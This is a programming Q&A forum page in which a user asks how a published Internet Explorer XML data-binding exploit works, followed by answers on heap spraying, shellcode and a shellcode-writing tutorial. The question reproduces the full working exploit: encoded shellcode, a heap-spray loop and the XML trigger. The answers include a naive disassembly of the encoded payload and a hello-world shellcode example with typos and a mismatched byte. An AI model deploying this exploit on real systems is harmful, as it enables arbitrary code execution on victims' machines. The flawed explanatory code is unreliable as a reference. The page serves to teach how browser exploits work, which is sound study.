145
votes

I usually do not have difficulty to read JavaScript code but for this one I can’t figure out the logic. The code is from an exploit that has been published 4 days ago. You can find it at milw0rm.

Here is the code:

<html>
    <div id="replace">x</div>
    <script>
        // windows/exec - 148 bytes
        // http://www.metasploit.com
        // Encoder: x86/shikata_ga_nai
        // EXITFUNC=process, CMD=calc.exe
        var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580");

        // ugly heap spray, the d0nkey way!
        // works most of the time
        var spray = unescape("%u0a0a%u0a0a");

        do {
           spray += spray;
        } while(spray.length < 0xd0000);

        memory = new Array();

        for(i = 0; i < 100; i++)
           memory[i] = spray + shellcode;

        xmlcode = "<XML ID=I><X><C><![CDATA[<image SRC=http://&#x0a0a;&#x0a0a;.example.com>]]></C></X></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>";

        tag = document.getElementById("replace");
        tag.innerHTML = xmlcode;

    </script>
</html>

Here is what I believe it does and I would like you to help me for the part that I misunderstand.

The variable shellcode contains the code to open the calc.exe. I do not get how they have found that weird string. Any idea?

The second thing is the variable spray. I do not understand this weird loop.

The third thing is the variable memory that is never used anywhere. Why do they create it?

Last thing: what does the XML tag do in the page?


For the moment I have good answers but mostly very general ones. I would like more explanations of the value of the code. An example is unescape("%u0a0a%u0a0a");. What does it mean? Same thing for the loop: why did the developer write: length < 0xd0000? I would like a deeper understanding, not only the theory of this code.

7
You should look into Heap Spraying: en.wikipedia.org/wiki/Heap_sprayingBobbyShaftoe
How do we successfully run this exploit? Do we have to run it in IE?bad_keypoints

7 Answers

321
votes

The shellcode contains some x86 assembly instructions that will do the actual exploit. spray creates a long sequence of instructions that will be put in memory. Since we can't usually find out the exact location of our shellcode in memory, we put a lot of nop instructions before it and jump to somewhere there. The memory array will hold the actual x86 code along with the jumping mechanism. We'll feed the crafted XML to the library which has a bug. When it's being parsed, the bug will cause the instruction pointer register to be assigned to somewhere in our exploit, leading to arbitrary code execution.

To understand more deeply, you should actually figure out what is in the x86 code. unscape will be used to put the sequence of bytes represented of the string in the spray variable. It's valid x86 code that fills a large chunk of the heap and jumps to the start of shellcode. The reason for the ending condition is string length limitations of the scripting engine. You can't have strings larger than a specific length.

In x86 assembly, 0a0a represents or cl, [edx]. This is effectively equivalent to nop instruction for the purposes of our exploit. Wherever we jump to in the spray, we'll get to the next instruction until we reach the shellcode which is the code we actually want to execute.

If you look at the XML, you'll see 0x0a0a is there too. Exactly describing what happens requires specific knowledge of the exploit (you have to know where the bug is and how it's exploited, which I don't know). However, it seems that we force Internet Explorer to trigger the buggy code by setting the innerHtml to that malicious XML string. Internet Explorer tries to parse it and the buggy code somehow gives control to a location of memory where the array exists (since it's a large chunk, the probability of jumping there is high). When we jump there the CPU will keep executing or cl, [edx] instructions until in reaches the beginning of shellcode that's put in memory.

I've disassembled the shellcode:

00000000  C9                leave
00000001  2B1F              sub ebx,[edi]
00000003  B10C              mov cl,0xc
00000005  BDC536DB9B        mov ebp,0x9bdb36c5
0000000A  D9C5              fld st5
0000000C  2474              and al,0x74
0000000E  5A                pop edx
0000000F  F4                hlt
00000010  EA8331FC0B6A6A    jmp 0x6a6a:0xbfc3183
00000017  03D4              add edx,esp
00000019  07                pop es
0000001A  67305CFF          xor [si-0x1],bl
0000001E  98                cwde
0000001F  BBD7FFA4FE        mov ebx,0xfea4ffd7
00000024  9B                wait
00000025  74AD              jz 0xffffffd4
00000027  058B8B028D        add eax,0x8d028b8b
0000002C  D893BCCD35A2      fcom dword [ebx+0xa235cdbc]
00000032  37                aaa
00000033  B84290A63A        mov eax,0x3aa69042
00000038  94                xchg eax,esp
00000039  E99AA4D58D        jmp 0x8dd5a4d8
0000003E  E5A3              in eax,0xa3
00000040  1F                pop ds
00000041  4C                dec esp
00000042  EB46              jmp short 0x8a
00000044  4B                dec ebx
00000045  8CD0              mov eax,ss
00000047  AD                lodsd
00000048  A844              test al,0x44
0000004A  52                push edx
0000004B  4A                dec edx
0000004C  3B81B80DD748      cmp eax,[ecx+0x48d70db8]
00000052  4B                dec ebx
00000053  D46C              aam 0x6c
00000055  46                inc esi
00000056  1392734A204F      adc edx,[edx+0x4f204a73]
0000005C  F8                clc
0000005D  6E                outsb
0000005E  DC8EA20726B4      fmul qword [esi+0xb42607a2]
00000064  04D4              add al,0xd4
00000066  D084ECBA978221    rol byte [esp+ebp*8+0x218297ba],1
0000006D  7CE8              jl 0x57
0000006F  C0CA8C            ror dl,0x8c
00000072  F4                hlt
00000073  A6                cmpsb
00000074  47                inc edi
00000075  210D2EA0B0CD      and [0xcdb0a02e],ecx
0000007B  2CA8              sub al,0xa8
0000007D  B05B              mov al,0x5b
0000007F  43                inc ebx
00000080  F4                hlt
00000081  24E8              and al,0xe8
00000083  7A9C              jpe 0x21
00000085  BB857DCBA0        mov ebx,0xa0cb7d85
0000008A  7DED              jnl 0x79
0000008C  92                xchg eax,edx
0000008D  09E1              or ecx,esp
0000008F  96                xchg eax,esi
00000090  315580            xor [ebp-0x80],edx

Understanding this shellcode requires x86 assembly knowledge and the problem in the MS library itself (to know what the system state is when we reach here), not JavaScript! This code will in turn execute calc.exe.

10
votes

This looks like an exploit of the recent Internet Explorer bug that Microsoft released the emergency patch for. It uses a flaw in the databinding feature of Microsoft's XML handler, that causes heap memory to be deallocated incorrectly.

Shellcode is machine code that will run when the bug occurs. Spray and memory are just some space allocated on the heap to help the exploitable condition occur.

3
votes

Heap Spraying is common way to exploit browser stuff, if you are into it you can find several posts like this : http://sf-freedom.blogspot.com/2006/06/heap-spraying-introduction.html

2
votes

Any time I see memory that doesn't get addressed in an exploit discussion, my first thought is that the exploit is some sort of buffer overflow, in which case the memory is either causing the buffer to overflow or is being accessed once the buffer overflows.

0
votes

This is from metasploit, that means it's using one of metasploit shell codes. It's open source so you can go and grab it : http://www.metasploit.com/

0
votes

See Character encodings in HTML.

It's binary data encoded as a string, which JavaScript is decoding.

Common form of XSS also.

You can see all the encoding tricks here:

http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project

0
votes

Simple shellcode example

Hello world in assembly at&t syntax x86 I believe (Wizard in Training).

set up the file:vim shellcodeExample.s

.text           #required
.goblal _start  #required

_start:         #main function
 jmp one        #jump to the section labeled one:

two:
 pop  %rcx         #pop %rcx off the stack, or something
 xor  %rax, %rax   #Clear
 movl 4, %rax      #use sys_write(printf || std::cout)
 xor  %rbx, %rbx   #Clear
 inc  %rbx         #increment %rbx to 1 stdout(terminal)
 xor  %rdx, %rdx   #Clear Registers or something
 movb $13, %dl     #String Size
 int  $0x80

one:
 call two                   #jump up to section two:
 .ascii "Hello World\r\n"   #make the string one of the starting memory 
                            #^-addresses

compile like so:as -o shellcodeExample.o shellcodeExample.s ; ld -s -o shellcode shellcodeExample.o

Now you have a binary that prints out hello world. to convert the binary into shell code type in: objdump -D shellcode

you will get the output:

shellcode:     file format elf64-x86-64


Disassembly of section .text:

0000000000400078 <.text>:
  400078:   eb 1a                   jmp    0x400094
  40007a:   59                      pop    %rcx
  40007b:   48 31 c0                xor    %rax,%rax
  40007e:   b0 04                   mov    $0x4,%al
  400080:   48 31 db                xor    %rbx,%rbx
  400083:   48 ff c3                inc    %rbx
  400086:   48 31 d2                xor    %rdx,%rdx
  400089:   b2 0d                   mov    $0xd,%dl
  40008b:   cd 80                   int    $0x80
  40008d:   b0 01                   mov    $0x1,%al
  40008f:   48 ff cb                dec    %rbx
  400092:   cd 80                   int    $0x80
  400094:   e8 e1 ff ff ff          callq  0x40007a
  400099:   68 65 6c 6c 6f          pushq  $0x6f6c6c65
  40009e:   20 77 6f                and    %dh,0x6f(%rdi)
  4000a1:   72 6c                   jb     0x40010f
  4000a3:   64                      fs
  4000a4:   0d                      .byte 0xd
  4000a5:   0a                      .byte 0xa

Now if you look on the 4th line with text you will see: 400078: eb 1a jmp 0x400094

the part that says eb 1a is the hexadecimal representation of the assembly instruction jmp one where "one" is the memory address of your string.

to prep your shellcode for execution open up another text file and store the hex values in a character array. To format the shell code correctly you type in a \x before every hex value.

the upcoming shell code example will look like the following according to the objdump command output:

unsigned char PAYLOAD[] = 
"\xeb\x1a\x59\x48\x31\xc0\xb0\x04\x48\x31\xdb\x48\xff\xc3\x48\x31\xd2\xb2\xd0\xcd\x80\xb0\x01\x48\xff\xcb\xcd\x80\xe8\xe1\xff\xff\xff\x68\x65\x6c\x6c\x6f\x20\x77\x6f\x72\x6c\x64\x0d\x0a";

This example uses C for the array. Now you have working shellcode that will write to stdout "hello world"

you can test the shell code by placing it in a vulnerability or you can write the following c program to test it:

vim execShellcode.cc; //linux command to create c file.

/*Below is the content of execShellcode.cc*/
unsigned char PAYLOAD[] = 
"\xeb\x1a\x59\x48\x31\xc0\xb0\x04\x48\x31\xdb\x48\xff\xc3\x48\x31\xd2\xb2\xd0\xcd\x80\xb0\x01\x48\xff\xcb\xcd\x80\xe8\xe1\xff\xff\xff\x68\x65\x6c\x6c\x6f\x20\x77\x6f\x72\x6c\x64\x0d\x0a";

int main(){
    ((void(*)(void))PAYLOAD)();
    return 0;
}

To compile the program type in:

gcc -fno-stack-protector -z execstack execShellcode.cc -o run

run with ./run You know have a working example of simple shellcode development that was tested in linux mint/debian.